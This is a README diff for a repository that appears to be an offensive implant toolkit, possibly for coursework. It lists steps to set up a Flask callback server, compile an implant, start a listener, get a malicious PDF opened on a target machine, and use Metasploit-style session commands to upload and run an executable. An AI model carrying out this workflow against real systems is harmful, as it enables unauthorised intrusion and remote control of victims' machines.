ehsu4220/CyberEffects_IPDIM/README.md

 2. Start flask server that is responsible for communicating with implants

           Make note of the IP and port that the flask server is running on so that the implants know where to communicate back to

+          Make changes to the 'srvip' variable in implant.cs with the srvip that the flask server uses

+3. Build the implant.cs into an executable

+          mcs implant.cs

-3. Start listener by running the listener.sh script
+4. Start listener by running the listener.sh script

           chmod +x listener.sh

           ./listener.sh

-4. Download and open the malicious PDF on the target machine
+5. Download and open the malicious PDF on the target machine

-5. Upload the upload_exe.rc file to the target machine via session
+6. Upload the upload_exe.rc file to the target machine via session

           sessions -i 1

           upload upload_exe.rc

-6. Run the resource script in order to upload and run the executable
+7. Run the resource script in order to upload and run the executable

           resource upload_exe.rc